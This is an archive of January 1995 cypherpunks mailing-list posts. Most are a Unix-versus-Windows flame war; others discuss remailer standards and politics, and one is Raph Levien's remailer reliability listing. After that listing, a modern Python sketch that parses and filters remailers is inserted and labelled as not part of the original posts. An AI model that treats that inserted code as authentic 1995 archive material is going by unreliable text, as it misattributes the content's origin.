Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300427.UAA21533@ix3.ix.netcom.com>
Message-ID: <Pine.SGI.3.91.950129224046.3652D-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Dale Harrison wrote:

> You wrote: 
> 
> >The only real barrier left to UNIX becoming the OS of choice is 
> >commercial app support (things like word processors and etc. becoming 
> >readily available and inexpensive).
> 
> I don't mean to toss gasoline onto this fire, but......
> 
> Unix as we know it has a vanishingly small probability of ever becoming 
> 'mainstream'. There's a two-orders-of-magnitude gap between the installed 
> base of Dos/Windows and that of Unix. That gap has grown, not narrowed 
> over time. This is however no reflection on the obvious technical merits 
> of Unix. Market dominance is based not on technical superiority, but 
> rather on technical sufficiency. Once an OS achieves technical 
> sufficiency any further technical improvements will have a diminishing 
> marginal effect on that OS's market performance. Once the OS is 
> technically sufficient, non-technical factors begin to dominate. The 
> market failure of WinNT is a classic example of this. Its failure is 
> unrelated to its technical merits (or lack thereof), but rather on 
> economic and social factors that even a company with the marketing muscle 
> of MicroSoft has not yet been able to overcome. (OS/2 is of course an 
> example of an even more dismal, perhaps terminal, failure for many of the 
> same reasons.)

so your point, basically, is that the public will settle for whatever it 
can get, and get easiest and cheapest, when it comes to software and 
operating systems in particular.  This may be the case, but there is 
certainly a growing market for internet-capable systems, and the most 
internet-friendly OS around is, of course, UNIX.  In that fact, and in 
the growing importance of having an OS that utilizes the full 
capabilities of increasingly powerful personal computers, lies the future 
of UNIX.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Sun, 29 Jan 95 22:45:22 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
Message-ID: <v03001109ab523a0cd3f8@[140.174.229.228]>
MIME-Version: 1.0
Content-Type: text/plain


Perhaps it's just me, but I thought the header that was substituted a few
days ago was designed to be a subtle hit to the flamers.  Since it seems
not to have worked, allow me to be a bit more explicit.

HEY, MORONS!  THIS IS AN ASSEMBLAGE OF PERSONS INTERESTED IN THE
FURTHERANCE OF CRYPTOGRAPHY.  While it is true that to persons not familiar
with a particular operating system, it may appear cryptic, this really
isn't what cryptography is all about.  TAKE IT ELSEWHERE!

Thank you.  Have a nice day.  Teco rules!

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Sun, 29 Jan 95 22:48:35 PST
To: cypherpunks@toad.com
Subject: UNIX bashing?
Message-ID: <199501300647.WAA00604@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>Microsoft hasn't really made any attempt to embrace the UNIX community.
>Why should we embrace Microsoft?

Gravity has made no attempt to embrace me, why should I embrace gravity? 
Because it's a force-of-nature bigger than any of us.  It's not a matter 
of embracing (or not embracing), it's a matter of recognizing the 
obvious.  

Also, just as an historical note, the official internal policy at 
Microsoft until about 1986-7 was that DOS was a stopgap measure that 
would eventually be replaced by a 16-bit version of Xenix (M/S's 
proprietary Unix variant) that would ship with the 286 based systems. It 
was the MARKET's rejection of Xenix that forced Microsoft to reluctantly 
look towards OS/2 and Windows rather than Unix as its future flagship 
OS.  Again, this has nothing to do with Unix's obvious technical merits, 
but the triumph of social, market and economic forces over technical 
forces.  Look at the fact that the existing global code-base consists 
overwhelmingly of Cobol closely followed by dBase with C/C++ trailing 
way down in the noise.  The real world is a messy and complex place.

Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sun, 29 Jan 95 15:31:48 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
In-Reply-To: <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com>
Message-ID: <1995Jan29.153057.11745@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com> grendel@netaxs.com (Michael Handler) writes:
>On Sat, 28 Jan 1995, Rhys Kyraden wrote:
>
>>         Since I have begun the project of writing the Remailer for the Mac,
>> I suddenly realized that I do not know exactly what is expected of it, and
>> therefore would like some pointers to the specs of a remailer (I have seen
>> references to padding and splitting but do not know what this is nor how to
>> implement it.)
>
>	I've started work on a formal remailer standards document that 
>describes just how a Cypherpunk Type I remailer should process messages, 
>with full header descriptions, etc. After I've checked it against the 
>behaviors of all the various Cypherpunk remailer packages (Ghio vs Eric 
>Hollander vs Sameer vs Mixmaster in compatibility mode vs whatever else), 
>I'll post it here for comments.

Cypherpunk Type I?  Ok, what are the other types?  Should there be a
type specification like there is for RAID, or the Body Armor Threat
levels?

I would like to try my hand at writing a remailer, but I would like to
see standards, and level/type specifications.

E.g. The body armor threat levels are I - VI
VI is able to physically stop a 50 BMG round, i.e. prevent
penetration.  The wearer of the armor would likely die from the shock,
but would not be penetrated.  Level II includes all the abilities of
level I and then some, III = II + some more, etc until VI which is
all of the abilities in body armor.

I believe that RAID levels are 1-5, and I seem to remember that it is
graduated like the body armor threat levels, so that 2=1 + some stuff,
4=3 + some stuff, etc.

Should we come up with a similar type of graduated system, and specs
for each, with some kind of negotiation between remailers, so that they
can determine what levels to use to communicate with various
remailers?

Then we could talk in terms of type 6, for example, having all the
abilities of levels 1-5 and then some.

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Sun, 29 Jan 95 20:38:39 PST
To: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Subject: UNIX bashing?
In-Reply-To: <199501300427.UAA21533@ix3.ix.netcom.com>
Message-ID: <9501300437.AA20704@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> I don't mean to toss gasoline onto this fire, but......
>

Too late...

 
> Unix as we know it has a vanishingly small probability of ever becoming 
> 'mainstream'. There's a two-orders-of-magnitude gap between the installed 
> base of Dos/Windows and that of Unix. That gap has grown, not narrowed 
> over time. This is however no reflection on the obvious technical merits 
> of Unix. Market dominance is based not on technical superiority, but 
> rather on technical sufficiency. Once an OS achieves technical 
> sufficiency any further technical improvements will have a diminishing 
> marginal effect on that OS's market performance. Once the OS is 
> technically sufficient, non-technical factors begin to dominate. The 
> market failure of WinNT is a classic example of this. Its failure is 
> unrelated to its technical merits (or lack thereof), but rather on 
> economic and social factors that even a company with the marketing muscle 
> of MicroSoft has not yet been able to overcome. (OS/2 is of course an 
> example of an even more dismal, perhaps terminal, failure for many of the 
> same reasons.)
>


UNIX is a _networking_ OS, in my mind, above and beyond anything else
which the 'mainstream' may desire.

If I want Excel, Word or Powerpoint, I'll use my PC (which is completely
compatible, via PPP, and able to exchange data) to work within these
obviously proprietary formats. :-)

Microsoft hasn't really made any attempt to embrace the UNIX community.

Why should we embrace Microsoft?

- paul

 
_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 21:55:47 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300522.VAA17151@jobe.shell.portal.com>
Message-ID: <Pine.SGI.3.91.950129233454.3652G-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995 anonymous-remailer@shell.portal.com wrote:

> Spif wrote:
> >UNIX?  user hostile?  where have you been lately?  
> 
> Well, maybe unix gets its reputation for being hostile because of
> things like 
> 
> * many commands don't work fully (find, for example)

find works just fine for me...  there's also "whereis", in case you 
didn't know...

> * a large portion choke on input that isn't "expected"

so give it "expected" input...  since when does DOS like "unexpected" 
input, anyhow?

> * many more do extremely poor input checking,

could we see an example of this?  I have yet to find one.

> * the configuration files are bizarre

again, provide an example.  again, I have yet to see one.

> * different versions have commands with different options (stty
>   everything, ps -ef vs. ps -aux, etc.)

different operating systems have differences...  the differences between 
IBM PC-DOS and MS-DOS are a good example.

> * each version is slightly different (ever try porting a non-trivial
>   program?  Look at some available large software and examine the #ifdef
>   #define #endif statements; look at the differences in system calls.
>   Hell, look at the "config" program that comes with PERL - 80K of stuff
>   to build a make file for the flavor of UNIX you are using!)

again, different OSes are different...  you don't expect every company to 
make the same UNIX, do you?  what point would there be in cloning each 
other?

> * the commands don't combine well (often uuencode + sendmail ==
>   garbage)

I've never encountered this...  perhaps because I uuencode things and 
THEN send them rather than trying to pipe a uuencode into mail.

> * many commands accept a slightly different regular expression syntax
>   than the shell does

again, does DOS *not* do this?  

> * the commands aren't built with ease of use in mind.  For example, to
>   kill a process under unix requires that I know its process id.  How
>   do I find that?  Run another command...

at least UNIX gives you the option of killing a process in the first 
place...  I can remember having to reboot DOS and fiddling with multiple 
configuration hassles just to clear a device driver out in order to solve 
an incompatibility problem with another program.

> > ever hear of X windows?
> 
> X-Windows is an extreme pain to get working.  Sure, if you buy your
> unix workstation the manufacturer will pre-install it.  Just try
> setting it up from scratch.

I've done it.  Several times.  Within minutes, each time.  And I'm not a 
guru, either.  And, as you've pointed out, I wouldn't have had to do even 
that if I was working with an already-setup system.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 22:08:25 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300539.VAA18044@jobe.shell.portal.com>
Message-ID: <Pine.SGI.3.91.950129235548.3652H-100000@sgi7.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995 anonymous-remailer@shell.portal.com wrote:

> Spif wrote:
> >so your point, basically, is that the public will settle for whatever it 
> >can get, and get easiest and cheapest, when it comes to software and 
> >operating systems in particular.  
> 
> It always puzzles me that people on the net spend so much time griping
> about Microsoft when the net tends towards libertarianism.  I would
> think libertarians would welcome Microsoft's dominance, as a
> validation of the free market in action.

I don't think supporting the free market has anything to do with 
supporting bad products.  I separate my ideological views from my 
technical opinions, quite frankly.  In addition, when did I single out 
Microsoft?  IBM and Apple make plenty of crappy products, which is ironic 
since they also make UNIX products that are technically superior and 
should probably be the de facto operating systems for their high-end 
machines (in fact, in IBM's case, they are - AIX is the default OS on rs6000 
machines).

> "Dos/Windows + applications available for Dos/Windows" are obviously
> blowing out "unix + applications available for unix".

that depends on what applications you're talking about...  if you mean 
Word Processors, Spreadsheets, and (perhaps) games, then I'd have to 
agree.  If you're talking about programming environments/tools, graphical 
interfaces, networking software, graphic design software, or file server 
applications, not to mention at least a few other categories, I'd have to 
disagree strongly.

> Normal people don't give a damn if source code is available for "power
> tools" like PERL, sed, grep, wc, bc, strip, yacc, lex, puke, barf,
> etc.

so UNIX users aren't "normal" now, eh?  by what standard do you define 
normal?  

> >certainly a growing market for internet-capable systems
> 
> OS/2 is internet friendly, Windows 95 will be friendly, etc.
> Certainly unix will let you do more, but most people won't care about
> the value of the extras, as long as a web browser, news reader, and
> mail reader is available.

we're talking about both client AND server applications here, as well as 
the robustness of the multitasking/threading capabilities of the OS they 
run on.  when surfing the net, it's best not to have your news reader 
choke because your web browser needs more resources.

> Some people on this list swear they never have to drop to a command
> line with the cool tools they use with their SLIP accounts (except to
> change their password).  If that's true, then any "advantage" unix has
> is washed away.  How will the unix market grow (relative to other more
> popular OS's) if internet access tools run the same on Windows and
> OS/2 and Mac's as they do on unix?

simple - they never will run the same, and they definitely won't run 
better, unless of course they are morphed into UNIX...  and I wouldn't be 
surprised if they do.  I see a day sometime not too far into the future 
when Windows, OS/2, and their kin either vanish completely or at least as 
non-UNIX operating systems, and are replaced with look-alike UNIX 
flavours with commercial app support.  if Microsoft, IBM, and/or Apple 
have the guts, that is.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Mon, 30 Jan 95 00:08:27 PST
To: rishab@dxm.ernet.in
Subject: Re: PFF's Magna Carta and the new netserfs
In-Reply-To: <gate.ywRkZc1w165w@dxm.ernet.in>
Message-ID: <m0rYr8r-0004IhC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> I've never figured out why governments are made out to be so bad; guns, ok,
> but the problems of privacy we face on this list have little to do with that.
> Corporations can be at least as bad - extreme government leads to socialism,
> which often retains some form of citizen-participation in decision-making;
> the corporate state, though, is exemplified in fascism, inherently much less
> concerned about citizen's rights.

Extreme government leads to totalitarianism, not socialism.

Governments as a whole are seen to be "bad" because they invariably undermine
the right of the individual to make choices for themselves.

> As many of us have argued, in what is sometimes called a 'post-capitalist'
> economy, (intellectual) property rights will not be enforceable. They may

And why should they?  After all, property rights are founded on a belief in
scarcity, which is a total fear-based illusion.

> be respected often - but then that requires no laws; after all no one had
> tried to rob Phil Zimmermann of his (only recently trademarked) 'PGP'. Those
> who depend too much on enforced rights will not survive. I've discussed in
> my column, Electric Dreams, and on this list the shift in economic structure
> that will have to take place - cooking-pot markets, knowledge exchanges etc;
> concept patents enforced by net.cops are most certainly 'Second Wave thinking!'

And there are certain areas of society that this scares, and who are already
making steps to stop it and clamp down. Where do you think all the scare
stories about "kiddie porn" and such on the net are coming from?

> > This said, it is essential that we understand what it really means 
> > to create a Third Wave government and begin the process of transformation.
> 
> 'Third Wave' is such a lovely phrase that it is all too easy to hand wave 
> opposing beliefs and concerns - "that's Second Wave thinking." Reminds me of 
> the Freudian defense against Jung - "Ah, Jung was sexually repressed as an 
> infant and therefore jealous of his mentor's open emphasis on id..." - 
> solipsism is great for argument, but does little to elicit the truth.

The so-called "Third Wave" has nothing to do with government and everything to
do with the empowerment of the individual.  Some seem to not recognize that.

> > [  There you have it. The American Dream and frontier
> > [  competitiveness lead us inevitably to the following
> > [  mandate for cyberspace:
> > [        (1) strong private property rights
> > [        (2) infrastructure to be owned by an
> > [            unregulated private monopoly
> > [        (3) investment to be written off rapidly
> 
> Those who remember their history will note that the original Magna Carta was
> not a pact that distributed power from a King to the people, but to a feudal
> nobility - the rest of us, netSERF on!

This has always been the case throughout history - the forces of dark, of
disinformation, have always attempted to keep true power from the hands of
the people.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spif <c642011@cclabs.missouri.edu>
Date: Sun, 29 Jan 95 23:56:12 PST
To: Dale Harrison <daleh@ix.netcom.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300630.WAA29275@ix2.ix.netcom.com>
Message-ID: <Pine.SGI.3.91.950130015104.9021B-100000@sgi15.phlab.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Jan 1995, Dale Harrison wrote:

> >This may be the case, but there is certainly a growing market for 
> >internet-capable systems, and the most internet-friendly OS around is, 
> >of course, UNIX.  
> 
> OS/2 comes internet-ready and pre-installed and it's still an almost 
> complete failure in the market.

that depends on what you think of as "internet-ready", IMHO.  OS/2 is 
ready to fail in an endeavour to be what UNIX has been for over 25 
years:  a _truly_ internet-friendly, multitasking, multithreading OS.

> >In that fact, and in the growing importance of having an OS that 
> >utilizes the full capabilities of increasingly powerful personal 
> >computers, lies the future of UNIX.
> 
> In any mature market, technical superiority above some baseline level of 
> sufficiency has no market value.  The auto market is a classic example 
> of this. Look how long tail-fins and chrome have dominated technical 
> superiority as the prime focus of marketing.  These are all marketing 
> issues not technical issues!

really?  I would think over a decade of Japanese technical superiority in 
automaking (better gas mileage, better safety features, etc.) and the 
resultant move by the "Big 3" to be even more technically superior would 
tend to contradict that notion.  Consumers are not totally stupid - they 
may drool over and rave about the latest flashy, technically inferior 
car, but when it comes down to it they'll most often buy the one with the 
best gas mileage, the best safety features, and so forth.

    Bryan Venable               | c642011@cclabs.missouri.edu
    Student & MOO Administrator | wlspif@showme.missouri.edu
    U of Missouri - Columbia    | spif@pobox.com
    SGI/Netscape/MOO addict     | spif@m-net.arbornet.org
    Spif or Turmandir @ MOOs    | http://www.phlab.missouri.edu/~c642011 

             <insert standard university disclaimer here>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sghahn@math1.kaist.ac.kr (han@joe.math.uga.edu)
Date: Mon, 30 Jan 95 02:01:22 PST
To: cypherpunks@toad.com
Subject: ECO_do
Message-ID: <199501300957.EAA11576@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyy4ASoZzwIn1bdtAQF1bgF/QaMqHAsZVan936Z8M6n76hyPhwMpypzr
ijlcRqCv+c99aD19Y4NDGtWz/ES3dtpg
=bLFx
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Name Withheld By Request <cs000rrs@selway.umt.edu>
Date: Mon, 30 Jan 95 05:38:10 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300522.VAA17151@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.91.950130063546.13138C-100000@selway.umt.edu>
MIME-Version: 1.0
Content-Type: text/plain



Does this stupid OS flamewar have *anything* to do with cypher? No.

Could it *PLEASE* be taken somewhere else?

Ryan Snyder, Consultant & Gopher Admin | "I've never seen a bigger group of
University of Montana                  | collectively angry, humorless, 
     -=>[Populus vult decipi!]<=-      | arrogant, bitter, gloomy-gus,
pinback@access.digex.net re:netizens--> FROWNY-FACED people in my whole life."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 30 Jan 95 06:49:55 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501301450.GAA22193@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@204.95.228.28

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"myriad"} = "<remailer@myriad.pc.cc.cmu.edu> cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp";
$remailer{"tower"} = "<remailer@tower.techwood.org> cpunk pgp";
$remailer{"eniac"} = "<vanklava@eniac.ac.siue.edu> cpunk pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

Use "premail -getkeys remailer.help.all@204.95.228.28" as a stopgap to
get PGP keys for the remailer, at least until Matt Ghio gets his
machine situation straightened out. Fingering this address works too.

Last ping: Mon 30 Jan 95 6:00:01 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
syrinx   syrinx@c2.org                       #++-***      35:58  99.81%
rahul    homer@rahul.net                  * *-#**-*+**    39:27  99.37%
ideath   remailer@ideath.goldenbear.com   - ----------  1:51:37  99.36%
penet    anon@anon.penet.fi               +***++**+***    40:00  99.99%
alumni   hal@alumni.caltech.edu           - ***-*+****    12:45  99.34%
bsu-cs   nowhere@bsu-cs.bsu.edu           * *+*++***+      6:31  99.29%
eniac    vanklava@eniac.ac.siue.edu                #**     3:12  99.35%
tower    remailer@tower.techwood.org               ***     7:29  99.35%
soda     remailer@csua.berkeley.edu       . ......--    8:10:54  99.25%
portal   hfinney@shell.portal.com         - **#-*+***#     7:47  99.22%
nately   remailer@nately.ucsd.edu         +  ++----+++    54:21  99.20%
mix      mixmaster@nately.ucsd.edu        +  +++---*-+    59:50  99.20%
usura    usura@replay.com                 - -***-*+-**    42:10  98.85%
xs4all   remailer@xs4all.nl               + -***-**-*+    41:06  98.69%
myriad   remailer@myriad.pc.cc.cmu.edu      ***** +***    11:53  96.60%
vox      remail@vox.xs4all.nl               -----...   16:49:12  97.08%
c2       remail@c2.org                        ++-+++    6:15:30  94.44%
q        q@c2.org                         - +   ---+-   1:46:44  87.22%
flame    tomaz@flame.sinet.org            _  -+*# +***  1:56:36  86.57%
rebma    remailer@rebma.mn.org            -.-.-_-_.-   25:42:02  82.30%
desert   remail@desert.xs4all.nl          _______.-    78:19:21  42.42%
extropia remail@extropia.wimsey.com       . +++         5:04:09  34.35%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in reply blocks using Encrypt-Key:
          header.


Raph Levien
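
An added illustration (not part of Raph Levien's message and not premail's own code): a Python sketch that parses both parts of the listing above and picks remailers by required features, uptime and latency. The function names and thresholds are assumptions; the sample rows are excerpted from the listing.

```python
import re

# Rows excerpted from the listing in the message above.
CAPABILITY_LINES = '''
$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
'''

PING_LINES = '''
penet    anon@anon.penet.fi               +***++**+***    40:00  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           * *+*++***+      6:31  99.29%
portal   hfinney@shell.portal.com         - **#-*+***#     7:47  99.22%
usura    usura@replay.com                 - -***-*+-**    42:10  98.85%
xs4all   remailer@xs4all.nl               + -***-**-*+    41:06  98.69%
vox      remail@vox.xs4all.nl               -----...   16:49:12  97.08%
c2       remail@c2.org                        ++-+++    6:15:30  94.44%
extropia remail@extropia.wimsey.com       . +++         5:04:09  34.35%
'''

# Remailer class -> header field naming the next hop (from "Options and features").
HEADER_FOR_CLASS = {
    "cpunk": "Request-Remailing-To",
    "eric": "Anon-Send-To",
    "penet": "X-Anon-To",
}

ENTRY_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')


def parse_capabilities(text):
    """Parse $remailer{...} lines into {name: {address, class, flags, pgp_key_id}}."""
    remailers = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue  # e.g. the 'is _not_ a remailer' notes
        name, address, rest = m.groups()
        tokens = rest.split()
        rclass = next((t for t in tokens if t in HEADER_FOR_CLASS), None)
        # "pgp." means the short name, not the address, is the encryption key ID.
        if "pgp." in tokens:
            key_id = name
        elif "pgp" in tokens:
            key_id = address
        else:
            key_id = None
        flags = {"pgp" if t == "pgp." else t for t in tokens if t != rclass}
        remailers[name] = {"address": address, "class": rclass,
                           "flags": flags, "pgp_key_id": key_id}
    return remailers


def to_seconds(latency):
    """Convert 'mm:ss' or 'h:mm:ss' (hours may exceed 24) to seconds."""
    seconds = 0
    for part in latency.split(":"):
        seconds = seconds * 60 + int(part)
    return seconds


def parse_pings(text):
    """Parse ping rows into {name: (address, latency_seconds, uptime_percent)}.

    The history column can contain spaces, so only the first two and the
    last two whitespace-separated fields are used.
    """
    pings = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[-1].endswith("%"):
            continue
        pings[fields[0]] = (fields[1], to_seconds(fields[-2]),
                            float(fields[-1].rstrip("%")))
    return pings


def select(remailers, pings, require=(), min_uptime=98.0, max_latency=3600):
    """Names of remailers having every required flag and acceptable statistics.

    Entries with no ping row, or whose address differs between the two parts
    of the listing, are excluded rather than trusted.
    """
    chosen = []
    for name, info in remailers.items():
        stats = pings.get(name)
        if stats is None or stats[0] != info["address"]:
            continue
        _, latency, uptime = stats
        if set(require) <= info["flags"] and uptime >= min_uptime and latency <= max_latency:
            chosen.append((uptime, name))
    return [name for _, name in sorted(chosen, reverse=True)]


def next_hop_header(remailers, name):
    """Header field this remailer expects for the forwarding address."""
    return HEADER_FOR_CLASS[remailers[name]["class"]]


if __name__ == "__main__":
    r, p = parse_capabilities(CAPABILITY_LINES), parse_pings(PING_LINES)
    for name in select(r, p, require={"pgp", "hash"}):
        print(name, next_hop_header(r, name), r[name]["pgp_key_id"])
```
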




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 06:07:58 PST
To: cypherpunks@toad.com
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <199501300522.VAA17151@jobe.shell.portal.com>
Message-ID: <9501301407.AA23479@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



